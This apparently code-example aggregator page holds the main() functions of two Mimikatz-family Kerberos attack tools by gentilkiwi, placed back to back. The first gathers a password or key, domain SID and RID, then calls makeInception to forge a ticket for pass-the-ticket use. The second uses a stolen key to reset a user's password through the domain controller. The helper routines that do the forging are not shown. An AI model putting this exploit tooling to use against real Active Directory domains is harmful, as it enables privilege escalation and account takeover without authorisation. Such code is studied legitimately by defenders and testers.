Beispiel #1
0
int main(int argc, char * argv[])
{
	EncryptionKey userKey;
	LPCSTR szUser, szDomain, szTarget, szService, szPassword = NULL, szKey = NULL, szSid, szRid, szKdc = NULL, szFilename = NULL;
	PSID sid = NULL, domainSid = NULL;
	DWORD ret, rid = 0;
	PDOMAIN_CONTROLLER_INFO cInfo = NULL;

	kprintf("\n"
		"  .#####.   " MIMIKATZ_FULL "\n"
		" .## ^ ##.  \n"
		" ## / \\ ##  /* * *\n"
		" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
		" '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)\n"
		"  '#####'    ...   with thanks to Tom Maddock & Sylvain Monne * * */\n\n");
	
	if(init())
	{
		if(!kull_m_string_args_byName(argc, argv, "ptt", NULL, NULL))
			kull_m_string_args_byName(argc, argv, "ticket", &szFilename, TICKET_FILENAME);

		if(kull_m_string_args_byName(argc, argv, "target", &szTarget, NULL))
		{
			if(kull_m_string_args_byName(argc, argv, "service", &szService, NULL))
			{
				if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
				{
					if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
					{
						if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL))
						{
							if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
								userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
							else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
								userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
							else
								userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;

							if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
							{
								if(!kull_m_string_args_byName(argc, argv, "kdc", &szKdc, NULL))
								{
									ret = DsGetDcName(NULL, szDomain, NULL, NULL, DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &cInfo);
									if(ret == ERROR_SUCCESS)
									{
										szKdc = cInfo->DomainControllerName + 2;
										kprintf("[KDC] \'%s\' will be the main server\n", szKdc);
									}
									else PRINT_ERROR("[KDC] DsGetDcName: %u\n", ret);
								}

								if(szKdc)
								{
									if(kull_m_string_args_byName(argc, argv, "sid", &szSid, NULL) && kull_m_string_args_byName(argc, argv, "rid", &szRid, NULL))
									{
										if(ConvertStringSidToSid(szSid, &sid))
											rid = strtoul(szRid, NULL, 0);
										else PRINT_ERROR_AUTO("ConvertStringSidToSid");
									}

									if(!(sid && rid))
									{
										if(szPassword)
										{
#pragma warning(push)
#pragma warning(disable:4996)
											impersonateToGetData(szUser, szDomain, szPassword, szKdc,&sid, &rid, _pgmptr);
#pragma warning(pop)
										}
										else PRINT_ERROR("Impersonate is only supported with a password (you need KDC, SID & RID)\n");
									}

									if(sid && rid)
									{
										kprintf("\n"
											"user     : %s\n"
											"domain   : %s\n"
											"password : %s\n"
											"sid      : "
											, szUser, szDomain, szKey ? "<NULL>" : "***");
										kull_m_string_displaySID(sid);
										kprintf("\n"
											"target   : %s\n"
											"service  : %s\n"
											"rid      : %u\n"
											"key      : "
											, szTarget, szService, rid);
										kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
										kprintf(" (%s)\n"
											"ticket   : %s\n"
											, kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype), szFilename ? szFilename : "** Pass The Ticket **");

										if(szKdc)
										{
											kprintf("kdc      : %s\n\n", szKdc);
											makeInception(szUser, szDomain, sid, rid, szTarget, szService, &userKey, szKdc, 88, szFilename);
										}
										else PRINT_ERROR("No KDC at all\n");

										LocalFree(sid);
									}
									else PRINT_ERROR("Missing valid SID & RID (argument or auto)\n");
								}
								else PRINT_ERROR("Missing one valid DC (argument or auto)\n");

								if(cInfo)
									NetApiBufferFree(cInfo);

								LocalFree(userKey.keyvalue.value);
							}
						}
						else PRINT_ERROR("Missing password/key argument\n");
					}
					else PRINT_ERROR("Missing domain argument\n");
				}
				else PRINT_ERROR("Missing user argument\n");
			}
			else PRINT_ERROR("Missing service argument\n");
		}
		else PRINT_ERROR("Missing target argument\n");
	}
	else PRINT_ERROR("init() failed\n");
	term();
	return 0;
}
int main(int argc, char * argv[])
{
	EncryptionKey userKey;
	LPCSTR szUser, szDomain, szPassword = NULL, szKey = NULL, szNew;
	LPSTR szWhatDC;
	
	kprintf("\n"
		"  .#####.   " MIMIKATZ_FULL "\n"
		" .## ^ ##.  " MIMIKATZ_SECOND "\n"
		" ## / \\ ##  /* * *\n"
		" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
		" '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)\n"
		"  '#####'     ...   with thanks to Aorato / Microsoft   ...   * * */\n\n");
	if(init())
	{
		if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
		{
			if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
			{
				if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL))
				{
					if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
						userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
					else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
						userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
					else
						userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;

					if(kull_m_string_args_byName(argc, argv, "new", &szNew, NULL))
					{
						if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
						{
							if(kull_m_kerberos_helper_net_getDC(szDomain, DS_KDC_REQUIRED, &szWhatDC))
							{
								kprintf("[KDC] \'%s\' will be the main server\n\n"
									"user     : %s\n"
									"domain   : %s\n"
									"password : %s\n"
									"key      : "
									, szWhatDC, szUser, szDomain, szKey ? "<NULL>" : "***");
								kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
								kprintf(" (%s)\n", kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype));

								makeInception(szUser, szDomain, szNew, &userKey, szWhatDC, 88, 464);
								LocalFree(szWhatDC);
							}
							LocalFree(userKey.keyvalue.value);
						}
					}
					else PRINT_ERROR("Missing new password\n");
				}
				else PRINT_ERROR("Missing password/key argument\n");
			}
			else PRINT_ERROR("Missing domain argument\n");
		}
		else PRINT_ERROR("Missing user argument\n");
	}
	else PRINT_ERROR("init() failed\n");
	term();
	return 0;
}